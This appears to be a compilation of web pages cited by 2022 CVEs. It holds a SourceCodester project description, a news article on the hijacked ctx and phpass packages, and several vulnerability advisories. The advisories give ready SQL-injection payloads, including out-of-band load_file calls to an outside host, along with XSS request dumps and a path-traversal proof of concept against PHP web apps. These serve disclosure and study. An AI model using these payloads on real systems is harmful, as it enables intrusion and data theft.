A stored cross-site scripting (XSS) vulnerability in /scas/?page=clubs/application_form&id=7 of School Club Application System v0.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter.

Submitted by oretnom23 on Thursday, April 7, 2022 - 17:48.

****Introduction****

This simple project is a **School Clubs Application System**. This is a web-based application project developed in **PHP** and **MySQL Database**. this application provides an online platform for exploring the different clubs in certain schools and submitting a membership application. This project has a simple and pleasant user interface using **Material Kit 2 Template** and **Bootstrap 5 Framework**. It consists of user-friendly features and functionalities.

****About the School Clubs Application System****

I developed this project using the following:

*   **XAMPP v3.3.0**
*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **Ajax**
*   **jQuery**
*   **Bootstrap**
*   **Google Material Icon**
*   **Material Kit 2 Template**

This **School Clubs Application System** is accessible to the **School Management, Club's Admin/Staff, and Students**. The **Management Site** is the side of the system where the school management has the privilege to access and manage the list of the school's student clubs. This site requires the **Admin Type** user credentials in order to gain access to the features and functionalities of this site. The **admin users** are the only ones who can register the **Club's Admin/Staff Users**. The **Club's Admin/Staff site** is the side of the application where the admin or staff of a certain club can manage the membership applications to their club submitted on the system. They can also update the application status. They can also view the basic information of the applicant including their contact information where they can reach back to the application according to their application. The students can access only the public site of the application where they are allowed to explore the active clubs of the school and read the information about each club.

****Features********Admin-Side****

*   **Home Page**
    *   Display the summary of the list.
*   **Club Management**
    *   Add New Club
    *   List All Clubs
    *   View Club Details
    *   Edit Club Details
    *   Delete Club Details
*   **User Management**
    *   Add New User
    *   List All Users
    *   View User Details
    *   Edit User Details
    *   Delete User Details
*   **Application Management**
    *   Add New Application
    *   List All Applications
    *   View Application Details
    *   Edit Application Details
    *   Delete Application Details
*   **Update System Information**
*   **Update Account Details/Credentials**
*   **Login and Logout**

****Club's Admin/Staff-Side****

*   **Home Page**
    *   Display the summary of the list.
*   **Application Management**
    *   Add New Application
    *   List All Applications
    *   View Application Details
    *   Edit Application Details
    *   Delete Application Details
*   **Update Account Details/Credentials**
*   **Login and Logout**

****Public-Side****

*   **Home Page**
    *   Display the Welcome Content.
*   **'About Us' Content**
*   **List All Active Clubs**
*   **View Club's Details**
*   **Club's Application Form**
*   **Submit Application**
*   **Login and Logout**

The source code was developed only for educational purposes only. You can download the source code for free and modify it the way you wanted.

**System Snapshots of some Features******Public-Side's Club List****

****Admin-Side Home Page****

****Club Details (Admin-Side)****

****User Details (Admin-Side)****

****Club's Admin/Staff-Side Home Page****

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)
*   **Download** the project assets at https://www.dropbox.com/s/tocky9atdwtk1gs/scas\_assets.zip?dl=1

****System Installation/Setup****

1.  **Enable** the **GD Library** in your **php.ini** file.
2.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
5.  **Extract** the **downloaded assets **zip** file**.
6.  **Copy** the extracted assets folder and **paste** it into the **source code** root path.
7.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
8.  **Create** a **new database** naming ****scas\_db****.
9.  **Import** the provided ****SQL**** file. The file is known as ****scas\_db.sql**** located inside the **database** folder.
10.  **Browse** the **School Clubs Application System** in a **browser**. i.e. ****http://localhost/scas/****.

****Admin Default Access:****

Username: **admin**  
Password: **admin123**

****DEMO VIDEO****

That's it. You can now explore the features and functionalities of this **School Clubs Application System** in **PHP**. I hope this will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   1578 views

CVE-2022-29359: School Club Application System in PHP/OOP Free Source Code

Online Fire Reporting System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Online Fire Reporting System 1.0 SQLi## Author: nu11secur1ty## Date: 05.24.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting## Description:The `date` parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+'was submitted in the `date` parameter.The attacker can take administrator accounts control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: date (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: page=reports&date=2022-05-24'+(selectload_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''OR NOT 3052=3052 AND 'yrRg'='yrRg    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: page=reports&date=2022-05-24'+(selectload_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''AND (SELECT 8940 FROM(SELECT COUNT(*),CONCAT(0x7170766b71,(SELECT(ELT(8940=8940,1))),0x7162767171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ATCs'='ATCs    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=reports&date=2022-05-24'+(selectload_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''AND (SELECT 9304 FROM (SELECT(SLEEP(5)))aaXF) AND 'lAbH'='lAbH    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: page=reports&date=2022-05-24'+(selectload_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170766b71,0x6d464b4556785048787241587a49795869777141684b4d5252784244626f77424b514675714f7349,0x7162767171),NULL,NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting)## Proof and Exploit:[href](https://streamable.com/znojdy)

Online Fire Reporting System 1.0 SQL Injection

Two trojanized Python and PHP packages have been uncovered in what's yet another instance of a software supply chain attack targeting the open source ecosystem.
One of the packages in question is "ctx," a Python module available in the PyPi repository. The other involves "phpass," a PHP package that's been forked on GitHub to distribute a rogue update.
"In both cases the attacker appears to have

Two trojanized Python and PHP packages have been uncovered in what's yet another instance of a software supply chain attack targeting the open source ecosystem.

One of the packages in question is "ctx," a Python module available in the PyPi repository. The other involves "phpass," a PHP package that's been forked on GitHub to distribute a rogue update.

"In both cases the attacker appears to have taken over packages that have not been updated in a while," the SANS Internet Storm Center (ISC) said, one of whose volunteer incident handlers, Yee Ching, analyzed the ctx package.

It's worth noting that ctx was last published to PyPi on December 19, 2014. On the other hand, phpass hasn't received an update since it was uploaded to Packagist on August 31, 2012.

The malicious Python package, which was pushed to PyPi on May 21, 2022, has been removed from the repository, but the PHP library still continues to be available on GitHub.

In both instances, the modifications are designed to exfiltrate AWS credentials to a Heroku URL named 'anti-theft-web.herokuapp\[.\]com.' "It appears that the perpetrator is trying to obtain all the environment variables, encode them in Base64, and forward the data to a web app under the perpetrator's control," Ching said.

It's suspected that the attacker managed to gain unauthorized access to the maintainer's account to publish the new ctx version. Further investigation has revealed that the threat actor registered the expired domain used by the original maintainer on May 14, 2022.

Linux diff command executed on original ctx 0.1.2 Package and the "new" ctx 0.1.2 Package

"With control over the original domain name, creating a corresponding email to receive a password reset email would be trivial," Ching added. "After gaining access to the account, the perpetrator could remove the old package and upload the new backdoored versions."

Coincidentally, on May 10, 2022, security consultant Lance Vick disclosed how it's possible to purchase lapsed NPM maintainer email domains and subsequently use them to re-create maintainer emails and seize control of the packages.

What's more, a metadata analysis of 1.63 million JavaScript NPM packages conducted by academics from Microsoft and North Carolina State University last year uncovered 2,818 maintainer email addresses associated with expired domains, effectively allowing an attacker to hijack 8,494 packages by taking over the NPM accounts.

"In general, any domain name can be purchased from a domain registrar allowing the purchaser to connect to an email hosting service to get a personal email address," the researchers said. "An attacker can hijack a user's domain to take over an account associated with that email address."

Should the domain of a maintainer turn out to be expired, the threat actor can acquire the domain and alter the DNS mail exchange (MX) records to appropriate the maintainer's email address.

"Looks like the phpass compromise happened because the owner of the package source - 'hautelook' deleted his account and then the attacker claimed the username," researcher Somdev Sangwan said in a series of tweets, detailing what's called a repository hijacking attack.

Public repositories of open source code such as Maven, NPM, Packages, PyPi, and RubyGems are a critical part of the software supply chain that many organizations rely on to develop applications.

On the flip side, this has also made them an attractive target for a variety of adversaries seeking to deliver malware.

This includes typosquatting, dependency confusion, and account takeover attacks, the latter of which could be leveraged to ship fraudulent versions of legitimate packages, leading to widespread supply chain compromises.

"Developers are blindly trusting repositories and installing packages from these sources, assuming they are secure," DevSecOps firm JFrog said last year, adding how threat actors are using the repositories as a malware distribution vector and launch successful attacks on both developer and CI/CD machines in the pipeline.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Popular PyPI Package 'ctx' and PHP Library 'phpass' Hijacked to Steal AWS Keys

Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to versions 3.1.45 and 4.1.1, template authors could inject php code by choosing a malicious {block} name or {include} file name. Sites that cannot fully trust template authors should upgrade to versions 3.1.45 or 4.1.1 to receive a patch for this issue. There are currently no known workarounds.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Changelog
    
*   *   By Plan
    *   Enterprise
    *   Teams
    *   Compare all
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2022-29221: Release v3.1.45 · smarty-php/smarty

Covid-19 Travel Pass Management System v1.0 is vulnerable to SQL Injection via /ctpms/classes/Master.php?f=update_application_status

Permalink

Cannot retrieve contributors at this time

**covid-19-travel-pass-management-system v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15308/covid-19-travel-pass-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /ctpms/classes/Master.php?f=update\_application\_status

Vulnerability location:/ctpms/classes/Master.php?f=update\_application\_status, id

\[+\] Payload: 1'and/\*\*/extractvalue(1,concat(char(126),database()))and' // Leak place ---> id

Tested on Windows 10, XAMPP

    POST /ctpms/classes/Master.php?f=update_application_status HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------4024160998608039623756913069
    Content-Length: 335
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/ctpms/admin/?page=applications/view_application&id=1
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------4024160998608039623756913069
    Content-Disposition: form-data; name="id"
    
    1'and/**/extractvalue(1,concat(char(126),database()))and'
    -----------------------------4024160998608039623756913069
    Content-Disposition: form-data; name="status"
    
    1
    -----------------------------4024160998608039623756913069--

CVE-2022-30838: bug_report_CVE/sql.md at main · mikeccltt/bug_report_CVE

Room-rent-portal-site v1.0 is vulnerable to Cross Site Scripting (XSS) via /rrps/classes/Master.php?f=save_category, vehicle_name.

Permalink

**room-rent-portal-site - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15301/room-rent-portal-site-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /rrps/classes/Master.php?f=save\_category

Vulnerability location: /rrps/classes/Master.php?f=save\_category, vehicle\_name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST http://192.168.2.106/rrps/classes/Master.php?f=save_category HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------39324278941716868132909560787
    Content-Length: 416
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/rrps/admin/?page=categories
    Cookie: PHPSESSID=h4hpbcj74nsiroalrkj8o2251s
    
    -----------------------------39324278941716868132909560787
    Content-Disposition: form-data; name="id"
    
    2
    -----------------------------39324278941716868132909560787
    Content-Disposition: form-data; name="name"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------39324278941716868132909560787
    Content-Disposition: form-data; name="status"
    
    1
    -----------------------------39324278941716868132909560787--

CVE-2022-30839: bug_report_CVE/xss.md at main · mikeccltt/bug_report_CVE

Covid-19 Travel Pass Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via /ctpms/classes/Users.php?f=save, firstname.

Permalink

**covid-19-travel-pass-management-system v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15308/covid-19-travel-pass-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /ctpms/classes/Users.php?f=save

Vulnerability location: /ctpms/classes/Users.php?f=save, firstname

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /ctpms/classes/Users.php?f=save HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------3611536016190209454970609370
    Content-Length: 1036
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/ctpms/admin/?page=user/manage_user&id=7
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------3611536016190209454970609370
    Content-Disposition: form-data; name="id"
    
    7
    -----------------------------3611536016190209454970609370
    Content-Disposition: form-data; name="firstname"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------3611536016190209454970609370
    Content-Disposition: form-data; name="middlename"
    
    dgfd
    -----------------------------3611536016190209454970609370
    Content-Disposition: form-data; name="lastname"
    
    gfdf
    -----------------------------3611536016190209454970609370
    Content-Disposition: form-data; name="username"
    
    gdf
    -----------------------------3611536016190209454970609370
    Content-Disposition: form-data; name="password"
    
    
    -----------------------------3611536016190209454970609370
    Content-Disposition: form-data; name="type"
    
    1
    -----------------------------3611536016190209454970609370
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------3611536016190209454970609370--

CVE-2022-30842: bug_report_CVE/xss.md at main · mikeccltt/bug_report_CVE

Room-rent-portal-site v1.0 is vulnerable to SQL Injection via /rrps/classes/Master.php?f=delete_category, id.

Permalink

**room-rent-portal-site v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15301/room-rent-portal-site-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /rrps/classes/Master.php?f=delete\_category

Vulnerability location:/rrps/classes/Master.php?f=delete\_category, id

\[+\] Payload: 2'and/\*\*/extractvalue(1,concat(char(126),database()))and'

Tested on Windows 10, XAMPP

    POST http://192.168.2.106/rrps/classes/Master.php?f=delete_category HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 60
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/rrps/admin/?page=categories
    Cookie: PHPSESSID=h4hpbcj74nsiroalrkj8o2251s
    
    id=2'and/**/extractvalue(1,concat(char(126),database()))and'

CVE-2022-30843: bug_report_CVE/sql.md at main · mikeccltt/bug_report_CVE

Path Traversal in GitHub repository filegator/filegator prior to 7.8.0.

**🔒️ Requirements**

Privilege: User

**📝 Description**

File path isn't properly sanitized and allow ..\.

**🕵️‍♂️ Proof of Concept****Listing other user folder content**

First, create a user with Read privilege and with specific home folder like /test. Then, Connect to his account and access the home page http://localhost:8080/:

From this, change folder using path traversal via cd parameter:

As you can see, we are able to view folder content.

**Write file**

First, create a user with Read and Write privileges and with specific home folder like /test. Then, Connect to his account and access the home page http://localhost:8080/. From here create a new file named ..\test.txt and then go to the root folder with another account:

You will see that the file was created outside of the test user's folder limitation.

PS: Note that the same could be done to all features in the file https://github.com/filegator/filegator/blob/642bb273334207359166d48b6c719a89e98a0676/backend/Controllers/FileController.php due to:

    $this->separator
    

**Impact**

An attacker can use path traversal to:

*   List files in folder that he shouldn't access.
*   Write|Move|Copy|... files in a folder that the current user hasn't the rights for.

CVE-2022-1850: Path Traversal in filegator

Toll-tax-management-system v1.0 is vulnerable to Cross Site Scripting (XSS) via /ttms/classes/Master.php?f=save_recipient, vehicle_name.

Permalink

Cannot retrieve contributors at this time

**toll-tax-management-system v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15304/toll-tax-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /ttms/classes/Master.php?f=save\_recipient

Vulnerability location: /ttms/classes/Master.php?f=save\_recipient, vehicle\_name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /ttms/classes/Master.php?f=save_recipient HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------24404946016694802869537324
    Content-Length: 870
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/ttms/admin/?page=recipients/manage_recipient
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="id"
    
    
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="category_id"
    
    2
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="toll_id"
    
    2
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="vehicle_name"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="vehicle_registration"
    
    asd
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="owner"
    
    asd
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="cost"
    
    100
    -----------------------------24404946016694802869537324--

Tag

#php